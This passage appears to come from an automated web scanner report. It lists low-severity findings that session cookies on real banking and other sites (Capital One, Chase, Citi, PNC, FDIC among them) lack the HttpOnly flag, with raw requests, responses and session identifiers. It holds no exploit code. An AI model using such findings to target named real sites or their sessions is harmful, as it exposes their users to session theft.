Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:11:53 GMT
Server: Apache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: JSESSIONID=XLwQNJWJ5GYGgnZ0NkdH6V6RyJygf7d1Bh1GGL0MF5G5nX3rNBYX!-201819150; path=/
Set-Cookie: TrackedProfileId=YW5vbnltb3VzXzMxNTExMDJialJRVlVqUDEwS3ZWOXRwQytlYytRPT0=; expires=Tuesday, 21-Feb-2079 01:26:00 GMT
Set-Cookie: SmallBusiness=876943e1cy4tLsnPTS0KTk3PTc0riTOoCUktLnFOzcmJMzCq8fF38i3NKckMTi0uzszPc84vBSoxrHGGanKtKEgtykzNS04F6gOq9cxDUwgA; domain=.capitalone.com; expires=Friday, 04-Mar-2011 22:11:53 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 68542

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta name="description" content="Browse business credit cards online and apply for C
...[SNIP]...

11.99. http://www.capitalone.com/smallbusiness/cards/index.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.capitalone.com
Path:   /smallbusiness/cards/index.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /smallbusiness/cards/index.php HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:11:57 GMT
Server: Apache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: JSESSIONID=FbpnNJWNTkZPPVyCtR9T3vhQFrHc45TyPPQ2LmGLKGmK8b3yr5XQ!1025162061; path=/
Set-Cookie: TrackedProfileId=YW5vbnltb3VzXzMxNDkzMDR1bFp4Rmh3TlZLcVFyL2JUZVJYcE9nPT0=; expires=Tuesday, 21-Feb-2079 01:26:04 GMT
Set-Cookie: SmallBusiness=876943e1cy4tLsnPTS0KTk3PTc0riTOoCUktLnFOzcmJMzCq8fF38i3NKckMTi0uzszPc84vBSoxrHGGanKtKEgtykzNS04F6gOq9cxDUwgA; domain=.capitalone.com; expires=Friday, 04-Mar-2011 22:11:57 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 68542

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta name="description" content="Browse business credit cards online and apply for C
...[SNIP]...

11.100. http://www.capitalone.com/smallbusiness/payroll/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.capitalone.com
Path:   /smallbusiness/payroll/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /smallbusiness/payroll/ HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:11:58 GMT
Server: Apache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: JSESSIONID=1LyBNJWTQDvpxXPth7p4yrMGr417XqLXvtLTJNWJDPZwntqtXcTX!-1660665105; path=/
Set-Cookie: TrackedProfileId=YW5vbnltb3VzXzMxMzk3OTRxNlVsM2hObzczWFlhQ2ZPV01ZajF3PT0=; expires=Tuesday, 21-Feb-2079 01:26:05 GMT
Set-Cookie: SmallBusiness=876943e1cy4tLsnPTS0KTk3PTc0riTOoCUktLnFOzcmJMzCq8fF38i3NKckMTi0uzszPc84vBSoxrHGGanKtKEgtykzNS04F6gOq9cxDUwgA; domain=.capitalone.com; expires=Friday, 04-Mar-2011 22:11:58 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 49209

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta name="description" content="Business Payroll (SM) - Capital One"/><meta name="k
...[SNIP]...

11.101. https://www.chase.com/MilitaryLendingProgram  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.chase.com
Path:   /MilitaryLendingProgram

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /MilitaryLendingProgram HTTP/1.1
Host: www.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;

Response

HTTP/1.1 301 Moved Permanently
Server: JPMC1.0
Date: Thu, 03 Feb 2011 01:06:32 GMT
Content-type: text/html
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Location: https://www.chase.com/ccpmweb/chf/document/militarylendingrogram.html
Set-Cookie: DCTMSESSION=pWqKNJ1Yv9NlgJ9kghvXKyZLpQVVXTgYyKD5x51HXqvvslJM3G4x!-661114096; path=/
Connection: close

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://www.chase.com/ccpmweb/chf/
...[SNIP]...

11.102. https://www.chase.com/ccp/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.chase.com
Path:   /ccp/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ccp/index.jsp HTTP/1.1
Host: www.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;

Response

HTTP/1.1 301 Moved Permanently
Server: JPMC1.0
Date: Wed, 02 Feb 2011 22:16:36 GMT
Content-type: text/html;charset=UTF-8
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Location: https://www.chase.com/
Set-Cookie: DCTMSESSION=JWTFNJXGmZr1X2nwQZHwnnLjtkzTGpQJ5DHvfJ94f6GFQqG4Qgyv!1262409899; path=/
Connection: close

<!--Generated by WebLogic Workshop-->


<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFF
...[SNIP]...

11.103. https://www.chase.com/chf/mortgage/om_chasecom_redirect  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.chase.com
Path:   /chf/mortgage/om_chasecom_redirect

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /chf/mortgage/om_chasecom_redirect HTTP/1.1
Host: www.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Wed, 02 Feb 2011 22:16:35 GMT
Content-length: 959
Content-type: text/html;charset=UTF-8
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Set-Cookie: DCTMSESSION=ShdXNJXDQb0ZFHj1qGKczSFvgTsznLZk7Y4h2czW2Hy7tvLD7KtZ!1262409899; path=/
Connection: close

<html LANG="EN" >
<head>
<META NAME="robots" CONTENT="index,follow"/>
<title >Chase</title>
</head>
<body><script language="JavaScript">
var s_pageName="Homeownership Center - Obama March 4th - chase
...[SNIP]...

11.104. https://www.chase.com/framework/skeletons/psmgenskel  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.chase.com
Path:   /framework/skeletons/psmgenskel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /framework/skeletons/psmgenskel HTTP/1.1
Host: www.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;

Response

HTTP/1.1 301 Moved Permanently
Server: JPMC1.0
Date: Wed, 02 Feb 2011 22:16:36 GMT
Content-type: text/html;charset=UTF-8
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Location: https://www.chase.com/cm/shared/crb/page/notfound.html
Set-Cookie: DCTMSESSION=TGFhNJXG71xk8S9N20Cn9bvPGH9yrm34fvpzv4HJ4vS1Qd9YSb6M!1262409899; path=/
Connection: close

<!--Generated by WebLogic Workshop-->


<html><head><title>302 Moved Temporarily</title></head>
<body
...[SNIP]...

11.105. https://www.chase.com/framework/skins/psmgenskin  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.chase.com
Path:   /framework/skins/psmgenskin

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /framework/skins/psmgenskin HTTP/1.1
Host: www.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;

Response

HTTP/1.1 301 Moved Permanently
Server: JPMC1.0
Date: Wed, 02 Feb 2011 22:16:37 GMT
Content-type: text/html;charset=UTF-8
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Location: https://www.chase.com/cm/shared/crb/page/notfound.html
Set-Cookie: DCTMSESSION=m6CMNJXFZC8PjQQGMf6sxvPhwgmTfjK0RYFv4QFJyyLQsBjXGn1m!2074473016; path=/
Connection: close

<!--Generated by WebLogic Workshop-->


<html><head><title>302 Moved Temporarily</title></head>
<body
...[SNIP]...

11.106. https://www.chase.com/framework/skins/psmgenskin/images  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.chase.com
Path:   /framework/skins/psmgenskin/images

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /framework/skins/psmgenskin/images HTTP/1.1
Host: www.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;

Response

HTTP/1.1 301 Moved Permanently
Server: JPMC1.0
Date: Wed, 02 Feb 2011 22:16:37 GMT
Content-type: text/html;charset=UTF-8
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Location: https://www.chase.com/cm/shared/crb/page/notfound.html
Set-Cookie: DCTMSESSION=6g6NNJXFxLM7k3X2S2lR1bkgB1YqhbvphnpHhSMxkgVP6SXmGTFQ!1262409899; path=/
Connection: close

<!--Generated by WebLogic Workshop-->


<html><head><title>302 Moved Temporarily</title></head>
<body
...[SNIP]...

11.107. https://www.chase.com/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.chase.com
Path:   /index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.jsp HTTP/1.1
Host: www.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;

Response

HTTP/1.1 301 Moved Permanently
Server: JPMC1.0
Date: Wed, 02 Feb 2011 22:16:34 GMT
Content-type: text/html;charset=UTF-8
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Location: https://www.chase.com/
Set-Cookie: DCTMSESSION=jfkfNJXCyH5XHZVYYRdMBh3DlcZvv0J0RGw0MtqzPlxX9TQR6Xvp!2074473016; path=/
Connection: close

<!--Generated by WebLogic Workshop-->


<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFF
...[SNIP]...

11.108. https://www.chase.com/online/logon/on_successful_logon.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.chase.com
Path:   /online/logon/on_successful_logon.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /online/logon/on_successful_logon.jsp HTTP/1.1
Host: www.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;

Response

HTTP/1.1 301 Moved Permanently
Server: JPMC1.0
Date: Wed, 02 Feb 2011 22:16:34 GMT
Content-type: text/html;charset=UTF-8
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Location: http://www.chase.com/cm/cs?urlname=shared/crb/page/notfound.jsp
Set-Cookie: DCTMSESSION=NKdvNJXCtfpNBvzYPBCnfP7wBLN2Mt3mCwB2QVmpcRW091j5sTGT!-1658401948; path=/
Connection: close

<!--Generated by WebLogic Workshop-->


<html><head><title>302 Moved Temporarily</title></head>
<bo
...[SNIP]...

11.109. http://www.citi.com/domain/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.citi.com
Path:   /domain/index.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /domain/index.jsp HTTP/1.1
Host: www.citi.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Server: ""
Date: Wed, 02 Feb 2011 21:59:53 GMT
Content-length: 0
Content-type: text/html; charset=ISO-8859-1
Cache-Control: no-cache="Set-Cookie"
Location: http://www.citi.com/domain/home.htm
Set-Cookie: JSESSIONID=R5X5NJTZ3ppnyZvlWDvGgDyfTxKqVG2Q4SL8xGJkwfC4xZlJ8Sds!-455328445; path=/
Set-Cookie: mobiledetect=false; expires=Thursday, 02-Feb-2012 21:59:53 GMT; path=/domain
Connection: close


11.110. http://www.citi.com/domain/scripts/config.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.citi.com
Path:   /domain/scripts/config.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /domain/scripts/config.jsp HTTP/1.1
Host: www.citi.com
Proxy-Connection: keep-alive
Referer: http://www.citi.com/domain/home.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mobiledetect=false; JSESSIONID=R5X5NJTZ3ppnyZvlWDvGgDyfTxKqVG2Q4SL8xGJkwfC4xZlJ8Sds!-455328445

Response

HTTP/1.1 200 OK
Server: ""
Date: Wed, 02 Feb 2011 21:59:54 GMT
Content-length: 167
Content-type: text/javascript; charset=ISO-8859-1
Cache-Control: no-cache="Set-Cookie"
Set-Cookie: JSESSIONID=s2KTNJThbyTnlpCPtyvkF2zsv2FT5zvpFDmjFtg5yHPRH7JNt5gg!1419886915; path=/
Connection: close


var CITI_ENV = 'http://www.citi.com';
var JFPDOMAIN = 'https://online.citibank.com';
var PGI = 'citi.bridgetrack.com';
var BVE = '.';
var HBX = 'DM550608DPBR';

11.111. http://www.citi.com/search/advanced.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.citi.com
Path:   /search/advanced.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /search/advanced.jsp HTTP/1.1
Host: www.citi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CbolBreadcrumb=.|/cgi-bin/citifi/scripts/|visitor|M_M%3DS|NNNNNNNNNNNNN|NNNNNNNNNNNNNNNNN|0|||https@//online.citibank.com||||; mobiledetect=false; JSESSIONID=s2KTNJThbyTnlpCPtyvkF2zsv2FT5zvpFDmjFtg5yHPRH7JNt5gg!1419886915; CP=null*;

Response

HTTP/1.1 200 OK
Server: ""
Date: Wed, 02 Feb 2011 22:16:52 GMT
Content-length: 9862
Content-type: text/html; charset=iso-8859-1
Cache-Control: no-cache="Set-Cookie"
Set-Cookie: JSESSIONID=J2p2NJXJWGcFrv05jcRLtCqdJlQJnBG9XFdLpDVyyTrCS2RvLqzq!187799042; path=/
Connection: close


<html>
<head>
<META HTTP-EQUIV='Content-Type' CONTENT='text/html; charset=ISO-8859-1'>
<title>Citi.com - Search</title>
<script type="text/javascript" src="/domain/cm/js/config.js"></script>
<script
...[SNIP]...

11.112. http://www.citi.com/search/results.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.citi.com
Path:   /search/results.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /search/results.jsp HTTP/1.1
Host: www.citi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CbolBreadcrumb=.|/cgi-bin/citifi/scripts/|visitor|M_M%3DS|NNNNNNNNNNNNN|NNNNNNNNNNNNNNNNN|0|||https@//online.citibank.com||||; mobiledetect=false; JSESSIONID=s2KTNJThbyTnlpCPtyvkF2zsv2FT5zvpFDmjFtg5yHPRH7JNt5gg!1419886915; CP=null*;

Response

HTTP/1.1 302 Moved Temporarily
Server: ""
Date: Wed, 02 Feb 2011 22:16:52 GMT
Content-type: text/html; charset=ISO-8859-1
Cache-Control: no-cache="Set-Cookie"
Location: http://www.citi.com/search/search.jsp
Set-Cookie: JSESSIONID=lFNyNJXJGtNdT2dBy6yQNSS22B51L6JfWN1bPnvznz3J1M5fnHhp!187799042; path=/
Connection: close

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://www.citi.com/search/search.
...[SNIP]...

11.113. https://www.citibank.com/us/cards/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.citibank.com
Path:   /us/cards/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /us/cards/index.jsp HTTP/1.1
Host: www.citibank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: ""
Date: Wed, 02 Feb 2011 22:16:55 GMT
Content-length: 854
Content-type: text/html; charset=ISO-8859-1
Cache-Control: no-cache="Set-Cookie"
Set-Cookie: JSESSIONID=GlQxNJXX9hjkzSqQqQWNphxfGRm78JMp2dwJ21YKmvTyYW6xpK69!-455328445; path=/
Connection: close

<html>
<head>
<title>Citi Credit Cards | Choose from a variety of Rewards Credit Cards, Student
Credit Cards, Small Business Credit Cards, and Value Credit Cards.</title>
<meta name="keywords" co
...[SNIP]...

11.114. http://www.cualn.com/members/stepthree  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cualn.com
Path:   /members/stepthree

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/stepthree HTTP/1.1
Host: www.cualn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:00:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Set-Cookie: SESS5dcca8fe1cebbc00afd6b71bc7e17676=0505b6f8eb0dfb02deb4a1644b2c68ec; expires=Sat, 26-Feb-2011 04:33:50 GMT; path=/; domain=.cualn.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 01:00:30 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 11430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
...[SNIP]...

11.115. http://www.directstartv.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.directstartv.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.directstartv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:07:13 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: PHPSESSID=5q1pmeo4qcq80k8jsrsa9kggt5; path=/; domain=.directstartv.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: DTV_ISC=0; expires=Thu, 02-Feb-2012 01:07:14 GMT; path=/; domain=.directstartv.com
Set-Cookie: Referrer=ds-nat-dtop-dent-ehome-none-directstartvcom-1461b; path=/; domain=.directstartv.com
Set-Cookie: Keyword=deleted; expires=Wed, 03-Feb-2010 01:07:13 GMT; path=/; domain=.directstartv.com
Set-Cookie: EngineID=deleted; expires=Wed, 03-Feb-2010 01:07:13 GMT; path=/; domain=.directstartv.com
Set-Cookie: VisitorID=149866862; expires=Fri, 03-Feb-2012 01:07:14 GMT; path=/; domain=.directstartv.com
Set-Cookie: Visits=1; expires=Fri, 03-Feb-2012 01:07:14 GMT; path=/; domain=.directstartv.com
Set-Cookie: VisitID=162207399; expires=Fri, 03-Feb-2012 01:07:14 GMT; path=/; domain=.directstartv.com
Set-Cookie: lpd=default; expires=Mon, 04-Apr-2011 01:07:14 GMT; path=/; domain=.directstartv.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33013

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

11.116. http://www.emagazine.com/view/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.emagazine.com
Path:   /view/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /view/?5489 HTTP/1.1
Host: www.emagazine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:06:39 GMT
Server: Apache/1.3.41 Ben-SSL/1.59 (Unix) mod_perl/1.30 PHP/4.3.4
X-Powered-By: PHP/4.3.4
Set-Cookie: PHPSESSID=ba6bb514b1fca2c3b23a260e9b9739c2; path=/; domain=www.emagazine.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 61787


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">    <html><head><title>More Sustainable Sushi (By Brita Belli)</title><meta name=
...[SNIP]...

11.117. https://www.esp01.pnc.com/LaunchPad/dflt/Login.pncadv  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.esp01.pnc.com
Path:   /LaunchPad/dflt/Login.pncadv

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /LaunchPad/dflt/Login.pncadv HTTP/1.1
Host: www.esp01.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:18:09 GMT
Server: Apache
Set-Cookie: JSESSIONID=0001MlXU1BY2vtyfBtHvrPCXhsj:pr-rdc678-61015gis-a/espts-ethasp8; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 7069


<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<HTML xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en">
<HEAD>
   <TI
...[SNIP]...

11.118. http://www.fdic.gov/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.fdic.gov
Path:   /

Issue detail

